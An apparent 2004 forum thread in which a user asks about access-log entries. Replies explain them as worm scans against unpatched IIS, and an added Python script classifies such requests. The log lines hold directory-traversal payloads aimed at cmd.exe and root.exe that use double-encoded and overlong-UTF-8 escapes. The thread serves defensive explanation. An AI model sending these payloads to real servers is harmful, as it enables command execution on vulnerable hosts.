jmoschetti45 -
Joined: 29 Oct 2003 Posts: 95 Location: MI USA
Posted: Mon Mar 01, 2004 8:49 pm Post subject: Hacked/Security Flaw?
I just happened to look in the log file and came across the following mess:
68.124.115.170 - - [13/Feb/2004:23:17:27 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:28 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:28 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:29 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:29 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 241 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:30 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 241 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:30 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 241 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:31 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 241 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:31 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:32 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:32 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:33 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:34 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 241 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:34 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 241 "" ""
Thing is I don't have a 'scripts' or 'msadc' folder. It also looks like something was trying to get to cmd.exe. Good thing Win 98 doesn't have it. Does anybody know what happened here?
 |
Anonymoose -
Joined: 09 Sep 2003 Posts: 2192
Posted: Mon Mar 01, 2004 8:54 pm
It's a scan by a worm designed to infect machines running unpatched versions of Microsoft IIS. Even if Windows 98 did have a cmd.exe it wouldn't have been served up by Abyss - the pathnames are designed to target a specific flaw in IIS. The 404 at the end of the line means the file was not found or served to the requesting IP - no danger to you at all, this is pretty much background traffic on the internet now until ISPs finally pull their finger out and start removing internet access from users with infected machines.
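
The triage described in the reply above (what was requested, and whether the status code shows it was served), as an added example that is not part of the original thread: it percent-decodes each request path until it stops changing, flags the encodings seen in the posted log (double-encoded `%255c`, overlong UTF-8 such as `%c0%af`), and counts probes per source IP that got a 2xx. The function names and reason labels are assumptions made for this example.

```python
import re
from urllib.parse import unquote_to_bytes
# Lines 1-3 are copied from the log in the first post; line 4 is constructed.
SAMPLE = [
    '68.124.115.170 - - [13/Feb/2004:23:17:27 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 239 "" ""',
    '68.124.115.170 - - [13/Feb/2004:23:17:29 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 241 "" ""',
    '68.124.115.170 - - [13/Feb/2004:23:17:32 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 239 "" ""',
    '192.0.2.10 - - [13/Feb/2004:23:20:00 -0500] "GET /index.html HTTP/1.0" 200 1024 "" ""',
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')

def decode_layers(path, max_rounds=5):
    """Percent-decode until the bytes stop changing; return (bytes, rounds)."""
    data = path.encode("utf-8")
    for rounds in range(max_rounds):
        nxt = unquote_to_bytes(data)
        if nxt == data:
            return data, rounds
        data = nxt
    return data, max_rounds

def classify(line):
    """Return (ip, status, served, reasons), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    raw, rounds = decode_layers(target.split("?", 1)[0])
    checks = {
        "double-encoded": rounds > 1,
        # 0xC0/0xC1 can only start an overlong 2-byte UTF-8 sequence
        "overlong-utf8": b"\xc0" in raw or b"\xc1" in raw,
        "traversal": b"../" in raw.replace(b"\\", b"/"),
        "shell-binary": raw.lower().endswith((b"cmd.exe", b"root.exe")),
    }
    reasons = [name for name, hit in checks.items() if hit]
    return ip, int(status), status.startswith("2"), reasons

def summarize(lines):
    """Per source IP: count of probe requests and how many got a 2xx."""
    out = {}
    for ip, _status, served, reasons in filter(None, map(classify, lines)):
        if reasons:
            entry = out.setdefault(ip, {"probes": 0, "served": 0})
            entry["probes"] += 1
            entry["served"] += int(served)
    return out

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

A non-zero "served" count is the case worth investigating; the lines in this thread all returned 404 or 400.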
 |
iNaNimAtE -
Joined: 05 Nov 2003 Posts: 2381 Location: Everywhere you're not.
Posted: Tue Mar 02, 2004 2:26 am
Yeah, I get these all the time. I really pay no attention because I did the best to secure my server, and I know these attacks are harmless. I suggest you look around for lists of common vulnerabilities, and make sure to "patch up!"
_________________
Welcome!